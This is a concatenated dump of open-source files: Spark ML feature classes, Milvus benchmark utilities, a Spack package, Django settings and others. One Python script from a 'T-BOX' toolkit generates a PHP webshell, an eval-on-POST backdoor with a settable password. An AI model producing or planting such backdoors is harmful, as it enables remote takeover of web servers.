"Optional array of labels to be provided by the user, if not supplied or " +
"empty, column metadata is read for labels")
@keyword_only
def __init__(self, inputCol=None, outputCol=None, labels=None):
super(IndexToString, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.IndexToString",
self.uid)
self.labels = Param(self, "labels",
"Optional array of labels to be provided by the user, if not " +
"supplied or empty, column metadata is read for labels")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, inputCol=None, outputCol=None, labels=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setLabels(self, value):
self._paramMap[self.labels] = value
return self
def getLabels(self):
return self.getOrDefault(self.labels)
class StopWordsRemover(JavaTransformer, HasInputCol, HasOutputCol):
stopWords = Param(Params._dummy(), "stopWords", "The words to be filtered out")
caseSensitive = Param(Params._dummy(), "caseSensitive", "whether to do a case sensitive " +
"comparison over the stop words")
@keyword_only
def __init__(self, inputCol=None, outputCol=None, stopWords=None,
caseSensitive=False):
super(StopWordsRemover, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.StopWordsRemover",
self.uid)
self.stopWords = Param(self, "stopWords", "The words to be filtered out")
self.caseSensitive = Param(self, "caseSensitive", "whether to do a case " +
"sensitive comparison over the stop words")
stopWordsObj = _jvm().org.apache.spark.ml.feature.StopWords
defaultStopWords = stopWordsObj.English()
self._setDefault(stopWords=defaultStopWords)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, inputCol=None, outputCol=None, stopWords=None,
caseSensitive=False):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setStopWords(self, value):
self._paramMap[self.stopWords] = value
return self
def getStopWords(self):
return self.getOrDefault(self.stopWords)
def setCaseSensitive(self, value):
self._paramMap[self.caseSensitive] = value
return self
def getCaseSensitive(self):
return self.getOrDefault(self.caseSensitive)
@inherit_doc
@ignore_unicode_prefix
class Tokenizer(JavaTransformer, HasInputCol, HasOutputCol):
@keyword_only
def __init__(self, inputCol=None, outputCol=None):
super(Tokenizer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.Tokenizer", self.uid)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
@inherit_doc
class VectorAssembler(JavaTransformer, HasInputCols, HasOutputCol):
@keyword_only
def __init__(self, inputCols=None, outputCol=None):
super(VectorAssembler, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.VectorAssembler", self.uid)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, inputCols=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
@inherit_doc
class VectorIndexer(JavaEstimator, HasInputCol, HasOutputCol):
maxCategories = Param(Params._dummy(), "maxCategories",
"Threshold for the number of values a categorical feature can take " +
"(>= 2). If a feature is found to have > maxCategories values, then " +
"it is declared continuous.")
@keyword_only
def __init__(self, maxCategories=20, inputCol=None, outputCol=None):
super(VectorIndexer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.VectorIndexer", self.uid)
self.maxCategories = Param(self, "maxCategories",
"Threshold for the number of values a categorical feature " +
"can take (>= 2). If a feature is found to have " +
"> maxCategories values, then it is declared continuous.")
self._setDefault(maxCategories=20)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, maxCategories=20, inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setMaxCategories(self, value):
self._paramMap[self.maxCategories] = value
return self
def getMaxCategories(self):
return self.getOrDefault(self.maxCategories)
def _create_model(self, java_model):
return VectorIndexerModel(java_model)
class VectorIndexerModel(JavaModel):
@inherit_doc
class VectorSlicer(JavaTransformer, HasInputCol, HasOutputCol):
indices = Param(Params._dummy(), "indices", "An array of indices to select features from " +
"a vector column. There can be no overlap with names.")
names = Param(Params._dummy(), "names", "An array of feature names to select features from " +
"a vector column. These names must be specified by ML " +
"org.apache.spark.ml.attribute.Attribute. There can be no overlap with " +
"indices.")
@keyword_only
def __init__(self, inputCol=None, outputCol=None, indices=None, names=None):
super(VectorSlicer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.VectorSlicer", self.uid)
self.indices = Param(self, "indices", "An array of indices to select features from " +
"a vector column. There can be no overlap with names.")
self.names = Param(self, "names", "An array of feature names to select features from " +
"a vector column. These names must be specified by ML " +
"org.apache.spark.ml.attribute.Attribute. There can be no overlap " +
"with indices.")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, inputCol=None, outputCol=None, indices=None, names=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setIndices(self, value):
self._paramMap[self.indices] = value
return self
def getIndices(self):
return self.getOrDefault(self.indices)
def setNames(self, value):
self._paramMap[self.names] = value
return self
def getNames(self):
return self.getOrDefault(self.names)
@inherit_doc
@ignore_unicode_prefix
class Word2Vec(JavaEstimator, HasStepSize, HasMaxIter, HasSeed, HasInputCol, HasOutputCol):
vectorSize = Param(Params._dummy(), "vectorSize",
"the dimension of codes after transforming from words")
numPartitions = Param(Params._dummy(), "numPartitions",
"number of partitions for sentences of words")
minCount = Param(Params._dummy(), "minCount",
"the minimum number of times a token must appear to be included in the " +
"word2vec model's vocabulary")
@keyword_only
def __init__(self, vectorSize=100, minCount=5, numPartitions=1, stepSize=0.025, maxIter=1,
seed=None, inputCol=None, outputCol=None):
super(Word2Vec, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.Word2Vec", self.uid)
self.vectorSize = Param(self, "vectorSize",
"the dimension of codes after transforming from words")
self.numPartitions = Param(self, "numPartitions",
"number of partitions for sentences of words")
self.minCount = Param(self, "minCount",
"the minimum number of times a token must appear to be included " +
"in the word2vec model's vocabulary")
self._setDefault(vectorSize=100, minCount=5, numPartitions=1, stepSize=0.025, maxIter=1,
seed=None)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, vectorSize=100, minCount=5, numPartitions=1, stepSize=0.025, maxIter=1,
seed=None, inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setVectorSize(self, value):
self._paramMap[self.vectorSize] = value
return self
def getVectorSize(self):
return self.getOrDefault(self.vectorSize)
def setNumPartitions(self, value):
self._paramMap[self.numPartitions] = value
return self
def getNumPartitions(self):
return self.getOrDefault(self.numPartitions)
def setMinCount(self, value):
self._paramMap[self.minCount] = value
return self
def getMinCount(self):
return self.getOrDefault(self.minCount)
def _create_model(self, java_model):
return Word2VecModel(java_model)
class Word2VecModel(JavaModel):
def getVectors(self):
return self._call_java("getVectors")
def findSynonyms(self, word, num):
if not isinstance(word, basestring):
word = _convert_to_vector(word)
return self._call_java("findSynonyms", word, num)
@inherit_doc
class PCA(JavaEstimator, HasInputCol, HasOutputCol):
k = Param(Params._dummy(), "k", "the number of principal components")
@keyword_only
def __init__(self, k=None, inputCol=None, outputCol=None):
super(PCA, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.PCA", self.uid)
self.k = Param(self, "k", "the number of principal components")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, k=None, inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setK(self, value):
self._paramMap[self.k] = value
return self
def getK(self):
return self.getOrDefault(self.k)
def _create_model(self, java_model):
return PCAModel(java_model)
class PCAModel(JavaModel):
@inherit_doc
class RFormula(JavaEstimator, HasFeaturesCol, HasLabelCol):
formula = Param(Params._dummy(), "formula", "R model formula")
@keyword_only
def __init__(self, formula=None, featuresCol="features", labelCol="label"):
super(RFormula, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.RFormula", self.uid)
self.formula = Param(self, "formula", "R model formula")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, formula=None, featuresCol="features", labelCol="label"):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setFormula(self, value):
self._paramMap[self.formula] = value
return self
def getFormula(self):
return self.getOrDefault(self.formula)
def _create_model(self, java_model):
return RFormulaModel(java_model)
class RFormulaModel(JavaModel):
if __name__ == "__main__":
import doctest
from pyspark.context import SparkContext
from pyspark.sql import Row, SQLContext
globs = globals().copy()
sc = SparkContext("local[2]", "ml.feature tests")
sqlContext = SQLContext(sc)
globs['sc'] = sc
globs['sqlContext'] = sqlContext
testData = sc.parallelize([Row(id=0, label="a"), Row(id=1, label="b"),
Row(id=2, label="c"), Row(id=3, label="a"),
Row(id=4, label="a"), Row(id=5, label="c")], 2)
globs['stringIndDf'] = sqlContext.createDataFrame(testData)
(failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
sc.stop()
if failure_count:
exit(-1)
| true
| true
|
1c4234b59d2bb634497dd779d5c0cfcece2d0d7f
| 315
|
py
|
Python
|
run.py
|
andreafioraldi/ascii-ctf
|
d1ca4e7826cb5a0fe4600cdd769d35eecd0125d0
|
[
"BSD-2-Clause"
] | 8
|
2019-03-20T09:11:24.000Z
|
2021-12-04T21:42:57.000Z
|
run.py
|
andreafioraldi/ascii-ctf
|
d1ca4e7826cb5a0fe4600cdd769d35eecd0125d0
|
[
"BSD-2-Clause"
] | null | null | null |
run.py
|
andreafioraldi/ascii-ctf
|
d1ca4e7826cb5a0fe4600cdd769d35eecd0125d0
|
[
"BSD-2-Clause"
] | 3
|
2019-05-18T06:56:34.000Z
|
2021-12-23T13:45:52.000Z
|
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from ascii_ctf import app
import os
http_server = HTTPServer(WSGIContainer(app))
http_server.listen(5000 if os.getenv("PORT") is None else int(os.getenv("PORT")),'0.0.0.0')
IOLoop.instance().start()
| 31.5
| 91
| 0.793651
|
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from ascii_ctf import app
import os
http_server = HTTPServer(WSGIContainer(app))
http_server.listen(5000 if os.getenv("PORT") is None else int(os.getenv("PORT")),'0.0.0.0')
IOLoop.instance().start()
| true
| true
|
1c423684b4b593f020b9926639ad1cddd04c6111
| 1,387
|
py
|
Python
|
playground/abstract/abs_ast.py
|
drew-loukusa/lang-playground
|
16e64001444f9cb20bc24228ea6588811e96eea0
|
[
"MIT"
] | null | null | null |
playground/abstract/abs_ast.py
|
drew-loukusa/lang-playground
|
16e64001444f9cb20bc24228ea6588811e96eea0
|
[
"MIT"
] | null | null | null |
playground/abstract/abs_ast.py
|
drew-loukusa/lang-playground
|
16e64001444f9cb20bc24228ea6588811e96eea0
|
[
"MIT"
] | null | null | null |
class AST:
def __init__(self, token=None, artificial=False, name=None):
self.name = (
name # Artificial nodes won't have any "token_text", so give them a name
)
self.token = token # From which token did we create node?
self.children = [] # normalized list of AST nodes
self.artificial = artificial
def is_none(self):
return self.token is None
def add_child(self, t):
self.children.append(t)
def add_children(self, *children):
for child in children:
self.children.append(child)
def __repr__(self):
token = str(self.token) if self.token is not None else None
artificial = self.name + " " if self.name is not None else None
token_info = None
if self.artificial:
token_info = "ARTIFICIAL - " + artificial
else:
token_info = token
ast_rep = f"<PG_AST: {token_info}>"
return ast_rep
def to_string_tree(self, tab=0):
if len(self.children) == 0:
print("| " * tab + str(self))
return
if not self.is_none():
print("| " * tab + f"{self}")
elif self.is_none() and self.artificial:
print("| " * tab + f"{self}")
for child in self.children:
if child != None:
child.to_string_tree(tab + 1)
| 30.152174
| 85
| 0.55876
|
class AST:
def __init__(self, token=None, artificial=False, name=None):
self.name = (
name
)
self.token = token # From which token did we create node?
self.children = [] # normalized list of AST nodes
self.artificial = artificial
def is_none(self):
return self.token is None
def add_child(self, t):
self.children.append(t)
def add_children(self, *children):
for child in children:
self.children.append(child)
def __repr__(self):
token = str(self.token) if self.token is not None else None
artificial = self.name + " " if self.name is not None else None
token_info = None
if self.artificial:
token_info = "ARTIFICIAL - " + artificial
else:
token_info = token
ast_rep = f"<PG_AST: {token_info}>"
return ast_rep
def to_string_tree(self, tab=0):
if len(self.children) == 0:
print("| " * tab + str(self))
return
if not self.is_none():
print("| " * tab + f"{self}")
elif self.is_none() and self.artificial:
print("| " * tab + f"{self}")
for child in self.children:
if child != None:
child.to_string_tree(tab + 1)
| true
| true
|
1c4236b5748bbe5e651eeeafccab2cbb7c42f1db
| 7,836
|
py
|
Python
|
tests/benchmark/milvus_benchmark/utils.py
|
haorenfsa/milvus
|
d8bab0cd21ce3d76576b4f75f76e1224bb1b5548
|
[
"Apache-2.0"
] | null | null | null |
tests/benchmark/milvus_benchmark/utils.py
|
haorenfsa/milvus
|
d8bab0cd21ce3d76576b4f75f76e1224bb1b5548
|
[
"Apache-2.0"
] | null | null | null |
tests/benchmark/milvus_benchmark/utils.py
|
haorenfsa/milvus
|
d8bab0cd21ce3d76576b4f75f76e1224bb1b5548
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import time
import logging
import string
import random
import json
import os
from yaml.representer import SafeRepresenter
# from yaml import full_load, dump
import yaml
import tableprint as tp
# from pprint import pprint
import config
logger = logging.getLogger("milvus_benchmark.utils")
def timestr_to_int(time_str):
""" Parse the test time set in the yaml configuration file and convert it to int type """
# time_int = 0
if isinstance(time_str, int) or time_str.isdigit():
time_int = int(time_str)
elif time_str.endswith("s"):
time_int = int(time_str.split("s")[0])
elif time_str.endswith("m"):
time_int = int(time_str.split("m")[0]) * 60
elif time_str.endswith("h"):
time_int = int(time_str.split("h")[0]) * 60 * 60
else:
raise Exception("%s not support" % time_str)
return time_int
class literal_str(str): pass
def change_style(style, representer):
def new_representer(dumper, data):
scalar = representer(dumper, data)
scalar.style = style
return scalar
return new_representer
# from yaml.representer import SafeRepresenter
# represent_str does handle some corner cases, so use that
# instead of calling represent_scalar directly
represent_literal_str = change_style('|', SafeRepresenter.represent_str)
yaml.add_representer(literal_str, represent_literal_str)
def retry(times):
"""
This decorator prints the execution time for the decorated function.
"""
def wrapper(func):
def newfn(*args, **kwargs):
attempt = 0
while attempt < times:
try:
result = func(*args, **kwargs)
if result:
break
else:
raise Exception("Result false")
except Exception as e:
logger.info(str(e))
time.sleep(3)
attempt += 1
return result
return newfn
return wrapper
def convert_nested(dct):
def insert(dct, lst):
for x in lst[:-2]:
dct[x] = dct = dct.get(x, dict())
dct.update({lst[-2]: lst[-1]})
# empty dict to store the result
result = dict()
# create an iterator of lists
# representing nested or hierarchial flow
lsts = ([*k.split("."), v] for k, v in dct.items())
# insert each list into the result
for lst in lsts:
insert(result, lst)
return result
def get_unique_name(prefix=None):
if prefix is None:
prefix = "distributed-benchmark-test-"
return prefix + "".join(random.choice(string.ascii_letters + string.digits) for _ in range(8)).lower()
def get_current_time():
""" return current time"""
return time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())
def print_table(headers, columns, data):
bodys = []
for index, value in enumerate(columns):
tmp = [value]
tmp.extend(data[index])
bodys.append(tmp)
tp.table(bodys, headers)
def get_deploy_mode(deploy_params):
"""
Get the server deployment mode set in the yaml configuration file
single, cluster, cluster_3rd
"""
deploy_mode = None
if deploy_params:
milvus_params = None
if "milvus" in deploy_params:
milvus_params = deploy_params["milvus"]
if not milvus_params:
deploy_mode = config.DEFUALT_DEPLOY_MODE
elif "deploy_mode" in milvus_params:
deploy_mode = milvus_params["deploy_mode"]
if deploy_mode not in [config.SINGLE_DEPLOY_MODE, config.CLUSTER_DEPLOY_MODE]:
raise Exception("Invalid deploy mode: %s" % deploy_mode)
return deploy_mode
def get_server_tag(deploy_params):
"""
Get service deployment configuration
e.g.:
server:
server_tag: "8c16m"
"""
server_tag = ""
if deploy_params and "server" in deploy_params:
server = deploy_params["server"]
server_tag = server["server_tag"] if "server_tag" in server else ""
return server_tag
def dict_update(source, target):
for key, value in source.items():
if isinstance(value, dict) and key in target:
dict_update(source[key], target[key])
else:
target[key] = value
return target
def search_param_analysis(vector_query, filter_query):
""" Search parameter adjustment, applicable pymilvus version >= 2.0.0rc7.dev24 """
if "vector" in vector_query:
vector = vector_query["vector"]
else:
logger.error("[search_param_analysis] vector not in vector_query")
return False
data = []
anns_field = ""
param = {}
limit = 1
if isinstance(vector, dict) and len(vector) == 1:
for key in vector:
anns_field = key
data = vector[key]["query"]
param = {"metric_type": vector[key]["metric_type"],
"params": vector[key]["params"]}
limit = vector[key]["topk"]
else:
logger.error("[search_param_analysis] vector not dict or len != 1: %s" % str(vector))
return False
if isinstance(filter_query, list) and len(filter_query) != 0 and "range" in filter_query[0]:
filter_range = filter_query[0]["range"]
if isinstance(filter_range, dict) and len(filter_range) == 1:
for key in filter_range:
field_name = filter_range[key]
expression = None
if 'GT' in filter_range[key]:
exp1 = "%s > %s" % (field_name, str(filter_range[key]['GT']))
expression = exp1
if 'LT' in filter_range[key]:
exp2 = "%s < %s" % (field_name, str(filter_range[key]['LT']))
if expression:
expression = expression + ' && ' + exp2
else:
expression = exp2
else:
logger.error("[search_param_analysis] filter_range not dict or len != 1: %s" % str(filter_range))
return False
else:
# logger.debug("[search_param_analysis] range not in filter_query: %s" % str(filter_query))
expression = None
result = {
"data": data,
"anns_field": anns_field,
"param": param,
"limit": limit,
"expression": expression
}
# logger.debug("[search_param_analysis] search_param_analysis: %s" % str(result))
return result
def modify_file(file_path_list, is_modify=False, input_content=""):
"""
file_path_list : file list -> list[<file_path>]
is_modify : does the file need to be reset
input_content :the content that need to insert to the file
"""
if not isinstance(file_path_list, list):
print("[modify_file] file is not a list.")
for file_path in file_path_list:
folder_path, file_name = os.path.split(file_path)
if not os.path.isdir(folder_path):
print("[modify_file] folder(%s) is not exist." % folder_path)
os.makedirs(folder_path)
if not os.path.isfile(file_path):
print("[modify_file] file(%s) is not exist." % file_path)
os.mknod(file_path)
else:
if is_modify is True:
print("[modify_file] start modifying file(%s)..." % file_path)
with open(file_path, "r+") as f:
f.seek(0)
f.truncate()
f.write(input_content)
f.close()
print("[modify_file] file(%s) modification is complete." % file_path_list)
def read_json_file(file_name):
""" return content of json file """
with open(file_name) as f:
file_dict = json.load(f)
return file_dict
| 31.219124
| 109
| 0.596988
|
import time
import logging
import string
import random
import json
import os
from yaml.representer import SafeRepresenter
import yaml
import tableprint as tp
import config
logger = logging.getLogger("milvus_benchmark.utils")
def timestr_to_int(time_str):
if isinstance(time_str, int) or time_str.isdigit():
time_int = int(time_str)
elif time_str.endswith("s"):
time_int = int(time_str.split("s")[0])
elif time_str.endswith("m"):
time_int = int(time_str.split("m")[0]) * 60
elif time_str.endswith("h"):
time_int = int(time_str.split("h")[0]) * 60 * 60
else:
raise Exception("%s not support" % time_str)
return time_int
class literal_str(str): pass
def change_style(style, representer):
def new_representer(dumper, data):
scalar = representer(dumper, data)
scalar.style = style
return scalar
return new_representer
represent_literal_str = change_style('|', SafeRepresenter.represent_str)
yaml.add_representer(literal_str, represent_literal_str)
def retry(times):
def wrapper(func):
def newfn(*args, **kwargs):
attempt = 0
while attempt < times:
try:
result = func(*args, **kwargs)
if result:
break
else:
raise Exception("Result false")
except Exception as e:
logger.info(str(e))
time.sleep(3)
attempt += 1
return result
return newfn
return wrapper
def convert_nested(dct):
def insert(dct, lst):
for x in lst[:-2]:
dct[x] = dct = dct.get(x, dict())
dct.update({lst[-2]: lst[-1]})
result = dict()
lsts = ([*k.split("."), v] for k, v in dct.items())
for lst in lsts:
insert(result, lst)
return result
def get_unique_name(prefix=None):
if prefix is None:
prefix = "distributed-benchmark-test-"
return prefix + "".join(random.choice(string.ascii_letters + string.digits) for _ in range(8)).lower()
def get_current_time():
return time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())
def print_table(headers, columns, data):
bodys = []
for index, value in enumerate(columns):
tmp = [value]
tmp.extend(data[index])
bodys.append(tmp)
tp.table(bodys, headers)
def get_deploy_mode(deploy_params):
deploy_mode = None
if deploy_params:
milvus_params = None
if "milvus" in deploy_params:
milvus_params = deploy_params["milvus"]
if not milvus_params:
deploy_mode = config.DEFUALT_DEPLOY_MODE
elif "deploy_mode" in milvus_params:
deploy_mode = milvus_params["deploy_mode"]
if deploy_mode not in [config.SINGLE_DEPLOY_MODE, config.CLUSTER_DEPLOY_MODE]:
raise Exception("Invalid deploy mode: %s" % deploy_mode)
return deploy_mode
def get_server_tag(deploy_params):
server_tag = ""
if deploy_params and "server" in deploy_params:
server = deploy_params["server"]
server_tag = server["server_tag"] if "server_tag" in server else ""
return server_tag
def dict_update(source, target):
for key, value in source.items():
if isinstance(value, dict) and key in target:
dict_update(source[key], target[key])
else:
target[key] = value
return target
def search_param_analysis(vector_query, filter_query):
if "vector" in vector_query:
vector = vector_query["vector"]
else:
logger.error("[search_param_analysis] vector not in vector_query")
return False
data = []
anns_field = ""
param = {}
limit = 1
if isinstance(vector, dict) and len(vector) == 1:
for key in vector:
anns_field = key
data = vector[key]["query"]
param = {"metric_type": vector[key]["metric_type"],
"params": vector[key]["params"]}
limit = vector[key]["topk"]
else:
logger.error("[search_param_analysis] vector not dict or len != 1: %s" % str(vector))
return False
if isinstance(filter_query, list) and len(filter_query) != 0 and "range" in filter_query[0]:
filter_range = filter_query[0]["range"]
if isinstance(filter_range, dict) and len(filter_range) == 1:
for key in filter_range:
field_name = filter_range[key]
expression = None
if 'GT' in filter_range[key]:
exp1 = "%s > %s" % (field_name, str(filter_range[key]['GT']))
expression = exp1
if 'LT' in filter_range[key]:
exp2 = "%s < %s" % (field_name, str(filter_range[key]['LT']))
if expression:
expression = expression + ' && ' + exp2
else:
expression = exp2
else:
logger.error("[search_param_analysis] filter_range not dict or len != 1: %s" % str(filter_range))
return False
else:
expression = None
result = {
"data": data,
"anns_field": anns_field,
"param": param,
"limit": limit,
"expression": expression
}
return result
def modify_file(file_path_list, is_modify=False, input_content=""):
if not isinstance(file_path_list, list):
print("[modify_file] file is not a list.")
for file_path in file_path_list:
folder_path, file_name = os.path.split(file_path)
if not os.path.isdir(folder_path):
print("[modify_file] folder(%s) is not exist." % folder_path)
os.makedirs(folder_path)
if not os.path.isfile(file_path):
print("[modify_file] file(%s) is not exist." % file_path)
os.mknod(file_path)
else:
if is_modify is True:
print("[modify_file] start modifying file(%s)..." % file_path)
with open(file_path, "r+") as f:
f.seek(0)
f.truncate()
f.write(input_content)
f.close()
print("[modify_file] file(%s) modification is complete." % file_path_list)
def read_json_file(file_name):
with open(file_name) as f:
file_dict = json.load(f)
return file_dict
| true
| true
|
1c4237c8308eb73fae7beab7359bba15be44693b
| 306
|
py
|
Python
|
setup.py
|
ipkn/somebox
|
1fedaa07236402269b8ad10dc9563f3d90aaead1
|
[
"MIT"
] | 4
|
2017-12-25T10:36:15.000Z
|
2018-01-01T10:42:34.000Z
|
setup.py
|
ipkn/somebox
|
1fedaa07236402269b8ad10dc9563f3d90aaead1
|
[
"MIT"
] | null | null | null |
setup.py
|
ipkn/somebox
|
1fedaa07236402269b8ad10dc9563f3d90aaead1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
from distutils.core import setup
setup(name='somebox',
version='0.0.1',
description='Dropbox-like file sharing service',
author='Jaeseung Ha',
author_email='ipknhama@gmail.com',
url='https://github.com/ipkn/somebox',
packages=['somebox'],
)
| 23.538462
| 54
| 0.640523
|
from distutils.core import setup
setup(name='somebox',
version='0.0.1',
description='Dropbox-like file sharing service',
author='Jaeseung Ha',
author_email='ipknhama@gmail.com',
url='https://github.com/ipkn/somebox',
packages=['somebox'],
)
| true
| true
|
1c42381fa1ef141081328c94ed77762e9634c47f
| 1,079
|
py
|
Python
|
auxiliary/summon/php-web.py
|
Qmeimei10086/T-BOX
|
5ca58311861b121fd337d26412e0f6ba8200ab66
|
[
"MIT"
] | 5
|
2020-07-17T03:13:49.000Z
|
2021-07-26T14:17:15.000Z
|
auxiliary/summon/php-web.py
|
Qmeimei10086/T-BOX
|
5ca58311861b121fd337d26412e0f6ba8200ab66
|
[
"MIT"
] | null | null | null |
auxiliary/summon/php-web.py
|
Qmeimei10086/T-BOX
|
5ca58311861b121fd337d26412e0f6ba8200ab66
|
[
"MIT"
] | 2
|
2020-09-28T14:46:26.000Z
|
2021-04-26T07:42:07.000Z
|
import os
password = '123456'
def summon_php(password):
f = open('shell.txt','w')
f.write("<?php @eval($_POST['")
f.write(password)
f.write("']); ?>")
f.close()
os.rename('shell.txt','shell.php')
print('[*]生成完毕 R > /shell.php',' password: '+password)
while True:
cmd = input('T-BOX auxiliary(summon/php) >')
if cmd == 'show options':
print(' ')
print('----------name---------content------------present---------')
print(' password ' + password + ' 后门密码 ')
print(' ')
elif cmd == '':
pass
elif cmd[:13] == 'set password ':
password = cmd[13:]
print('[*]password ==> '+password)
elif cmd == 'run':
print('start.......')
summon_php(password=password)
elif cmd == 'back':
break
else:
print("[-]can't find command: " + cmd)
| 26.317073
| 76
| 0.39481
|
import os
password = '123456'
def summon_php(password):
f = open('shell.txt','w')
f.write("<?php @eval($_POST['")
f.write(password)
f.write("']); ?>")
f.close()
os.rename('shell.txt','shell.php')
print('[*]生成完毕 R > /shell.php',' password: '+password)
while True:
cmd = input('T-BOX auxiliary(summon/php) >')
if cmd == 'show options':
print(' ')
print('----------name---------content------------present---------')
print(' password ' + password + ' 后门密码 ')
print(' ')
elif cmd == '':
pass
elif cmd[:13] == 'set password ':
password = cmd[13:]
print('[*]password ==> '+password)
elif cmd == 'run':
print('start.......')
summon_php(password=password)
elif cmd == 'back':
break
else:
print("[-]can't find command: " + cmd)
| true
| true
|
1c42382591392e7525836c3f91d1ee5694ec9c32
| 1,011
|
py
|
Python
|
var/spack/repos/builtin/packages/atom-dft/package.py
|
HaochengLIU/spack
|
26e51ff1705a4d6234e2a0cf734f93f7f95df5cb
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 2
|
2018-11-27T03:39:44.000Z
|
2021-09-06T15:50:35.000Z
|
var/spack/repos/builtin/packages/atom-dft/package.py
|
HaochengLIU/spack
|
26e51ff1705a4d6234e2a0cf734f93f7f95df5cb
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1
|
2019-01-11T20:11:52.000Z
|
2019-01-11T20:11:52.000Z
|
var/spack/repos/builtin/packages/atom-dft/package.py
|
HaochengLIU/spack
|
26e51ff1705a4d6234e2a0cf734f93f7f95df5cb
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1
|
2020-10-14T14:20:17.000Z
|
2020-10-14T14:20:17.000Z
|
# Copyright 2013-2018 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class AtomDft(MakefilePackage):
"""ATOM is a program for DFT calculations in atoms and pseudopotential
generation."""
homepage = "https://departments.icmab.es/leem/siesta/Pseudopotentials/"
url = "https://departments.icmab.es/leem/siesta/Pseudopotentials/Code/atom-4.2.6.tgz"
version('4.2.6', 'c0c80cf349f951601942ed6c7cb0256b')
depends_on('libgridxc')
depends_on('xmlf90')
def edit(self, spec, prefix):
copy('arch.make.sample', 'arch.make')
@property
def build_targets(self):
return ['XMLF90_ROOT=%s' % self.spec['xmlf90'].prefix,
'GRIDXC_ROOT=%s' % self.spec['libgridxc'].prefix,
'FC=fc']
def install(self, spec, prefix):
mkdir(prefix.bin)
install('atm', prefix.bin)
| 30.636364
| 94
| 0.664688
|
from spack import *
class AtomDft(MakefilePackage):
homepage = "https://departments.icmab.es/leem/siesta/Pseudopotentials/"
url = "https://departments.icmab.es/leem/siesta/Pseudopotentials/Code/atom-4.2.6.tgz"
version('4.2.6', 'c0c80cf349f951601942ed6c7cb0256b')
depends_on('libgridxc')
depends_on('xmlf90')
def edit(self, spec, prefix):
copy('arch.make.sample', 'arch.make')
@property
def build_targets(self):
return ['XMLF90_ROOT=%s' % self.spec['xmlf90'].prefix,
'GRIDXC_ROOT=%s' % self.spec['libgridxc'].prefix,
'FC=fc']
def install(self, spec, prefix):
mkdir(prefix.bin)
install('atm', prefix.bin)
| true
| true
|
1c42387b1ebfe6056c5b893f540ce5c174057639
| 4,234
|
py
|
Python
|
todo_django/todo_django/settings.py
|
danjac/todo-djember
|
7fcfc644c73b702ae9e18a9a27bea0b075fea187
|
[
"MIT"
] | 2
|
2016-12-08T11:24:54.000Z
|
2017-03-18T04:36:35.000Z
|
todo_django/todo_django/settings.py
|
danjac/todo-djember
|
7fcfc644c73b702ae9e18a9a27bea0b075fea187
|
[
"MIT"
] | null | null | null |
todo_django/todo_django/settings.py
|
danjac/todo-djember
|
7fcfc644c73b702ae9e18a9a27bea0b075fea187
|
[
"MIT"
] | null | null | null |
"""
Django settings for todo_django project.
Generated by 'django-admin startproject' using Django 1.9.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'ry%8!dfeiilht!0!da0h29!y4tnnzu8qe6%79bsy4i(_nb%k(u'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'corsheaders',
'rest_framework',
